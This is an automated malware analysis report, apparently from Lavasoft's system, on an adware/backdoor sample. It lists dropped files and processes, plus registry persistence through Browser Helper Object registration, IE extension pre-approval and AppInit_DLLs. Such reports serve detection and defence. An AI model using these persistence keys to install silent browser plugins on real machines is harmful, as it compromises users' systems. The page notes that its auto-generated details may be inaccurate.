Gen.Variant.Adware.MPlug.38_874a6a15d1

by malwarelabrobot on May 11th, 2015 in Malware Descriptions.

Gen:Variant.Adware.MPlug.38 (B) (Emsisoft), Gen:Variant.Adware.MPlug.38 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)
Behaviour: Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 874a6a15d18c264327f5c81ec98e2cf9
SHA1: b90f3dd3fba951e828a2a234121e3fe3916cc230
SHA256: 4e8aed5e3c3e1520d6e4a473dca4d0a5240c3a36ddbd4aa1ec2e7adfef5ea047
SSDeep: 12288:Bz5KLZTKN8Vgo 2PlRiTPYwfGnU/3dMvb:Bz4LZTKzOoTPYwfGnmMT
Size: 465920 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-04 03:38:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:1932 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)

The process ArmorerRise.xyz.exe:2036 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)

The process %original file name%.exe:1176 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6 (0 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (0 bytes)

The process %original file name%.exe:1988 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca (0 bytes)

The process %original file name%.exe:368 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\2.ini (0 bytes)

The process %original file name%.exe:1888 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7 (0 bytes)

The process %original file name%.exe:188 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)

The Backdoor deletes the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1 (0 bytes)

The process %original file name%.exe:1016 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0e466769 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (0 bytes)

Registry activity

The process regsvr32.exe:1932 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6942a161-f713-42a7-a4aa-3bafc71fc8a6}" = "1"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\0\win32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CurVer]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\ProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\VersionIndependentProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}]
"(Default)" = "IRegistry"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\HELPDIR]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}]
"(Default)" = "IRuntime"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_]
"(Default)" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 23 59 E0 34 27 93 FA 50 40 84 2D 22 09 F9 23"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\Programmable]
"(Default)" = ""

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}]
"(Default)" = "ILocalStorage"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

The process regsvr32.exe:1980 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\0\win32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\ProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\VersionIndependentProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_]
"(Default)" = "WWhiteCouPooni"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}]
"(Default)" = "IRegistry"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9]
"(Default)" = "WWhiteCouPooni"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\Programmable]
"(Default)" = ""

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D3 10 D1 CD AA 10 F1 E6 87 98 BE 13 27 48 F6"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}]
"(Default)" = "IRuntime"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\HELPDIR]
"(Default)" = "%Program Files%\WWhiteCouPooni"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CurVer]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6dd13515-e089-4fae-8645-2fa8c57153de}" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"

"NoExplorer" = "1"

The process ArmorerRise.xyz.exe:2036 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"fe94ce1e" = "V/////%%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Publisher" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"3c09c42b" = "///%"
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoRepair" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"DisplayName" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"State" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Cache" = "9428760297565573948"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

